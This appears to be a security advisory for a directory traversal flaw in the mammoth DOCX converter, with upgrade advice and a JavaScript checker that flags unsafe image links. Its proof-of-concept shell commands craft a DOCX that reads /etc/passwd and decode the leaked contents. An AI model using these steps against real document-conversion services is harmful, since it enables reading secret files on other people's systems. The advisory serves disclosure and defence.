Mammoth Directory Traversal CVE-2023-3032 (Critical)

The vulnerability exists in the mammoth document conversion library. When processing a DOCX file containing an image with an external link (using the `r:link` attribute), the library does not validate the resolved file path: it resolves the URI from the document directly to a local file system path, reads that path, and base64-encodes its content into the final HTML output as a data URI. An attacker can exploit this by crafting a malicious DOCX file whose image link points to a sensitive system file using directory traversal sequences (e.g., ../../etc/passwd). The library resolves the path, reads the specified file, and includes its contents in the output, leading to arbitrary file disclosure. Additionally, linking to device files such as `/dev/random` can cause Denial of Service through resource exhaustion.
Platform: Node.js, Java
Version: <1.11.0

Vulnerability : Directory Traversal

Severity: Critical

Date: 2023-07-27

Prediction: 2023-08-10

What Undercode Says:

# Crafting a malicious DOCX with a traversal link: zip reads files, not stdin,
# so write the relationship part to disk, then update an existing archive with it
mkdir -p word/_rels
cat > word/_rels/document.xml.rels <<'EOF'
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../../../../etc/passwd" TargetMode="External"/>
EOF
zip -u malicious.docx word/_rels/document.xml.rels
# Simulating the vulnerable conversion command
npx mammoth malicious.docx output.html
# Checking for file disclosure in output (\K drops the "base64," prefix before decoding)
grep -oP 'base64,\K[^"]+' output.html | base64 -d

How Exploit:

Craft a DOCX with an external image link using `Target="../../etc/passwd"` and `TargetMode="External"`. Run mammoth to convert it; the sensitive file content appears in the HTML as a base64 data URI.

Protection from this CVE

Upgrade to mammoth version 1.11.0 or later. Sanitize user-supplied DOCX files before processing. Implement file path validation and restrict file access to a sandboxed environment.
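A pre-flight check that implements the "sanitize user-supplied DOCX files before processing" advice above, as an added example that is not part of this advisory or of the mammoth project: it scans the document.xml.rels part for image relationships whose external target would be read from the local filesystem (traversal, absolute or device paths, file: URIs) so the document can be refused before mammoth ever resolves the path. It assumes the caller has already extracted word/_rels/document.xml.rels from the .docx zip and passes its text in; the sample part below is constructed.

```javascript
const IMAGE_REL_TYPE =
  "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image";

// Minimal attribute parser for <Relationship .../> elements (both quote
// styles); a real XML parser is preferable in production code.
function parseRelationships(relsXml) {
  const rels = [];
  for (const m of relsXml.matchAll(/<Relationship\b([^>]*?)\/?>/g)) {
    const attrs = {};
    for (const a of m[1].matchAll(/([\w:]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g)) {
      attrs[a[1]] = a[2] !== undefined ? a[2] : a[3];
    }
    rels.push(attrs);
  }
  return rels;
}

// Why an external image target is unsafe for a converter that reads the
// target from the local filesystem; null means a remote URL (no local read).
function classifyTarget(target) {
  let t = target.trim();
  try { t = decodeURIComponent(t); } catch (_) { /* keep the raw value */ }
  t = t.replace(/\\/g, "/");               // normalise Windows separators
  if (/^file:/i.test(t)) return "file-uri";
  if (/^\//.test(t) || /^[a-z]:\//i.test(t)) return "absolute-path"; // incl. /dev/random
  if (t.split("/").includes("..")) return "traversal";
  if (/^https?:\/\//i.test(t)) return null;
  return "local-relative-path";             // resolved against the host fs
}

// Offending image relationships in a document.xml.rels part; [] means clean.
function findUnsafeImageLinks(relsXml) {
  const findings = [];
  for (const r of parseRelationships(relsXml)) {
    if (r.Type !== IMAGE_REL_TYPE || r.TargetMode !== "External") continue;
    const reason = classifyTarget(r.Target || "");
    if (reason) findings.push({ id: r.Id, target: r.Target, reason });
  }
  return findings;
}

// Constructed sample: a relationship part of the kind the advisory describes.
const CRAFTED_RELS = `<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="${IMAGE_REL_TYPE}" Target="../../../../etc/passwd" TargetMode="External"/>
  <Relationship Id="rId2" Type="${IMAGE_REL_TYPE}" Target="media/image1.png"/>
</Relationships>`;

console.log(findUnsafeImageLinks(CRAFTED_RELS)); // [{ id: 'rId1', target: '../../../../etc/passwd', reason: 'traversal' }]
```

Reject the upload when the returned array is non-empty; internal relationships (no TargetMode) are left alone since they resolve inside the package.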

Impact:

Arbitrary file read on host system, potential Denial of Service via resource exhaustion by reading device files like /dev/zero.

Sources:

Reported By: github.com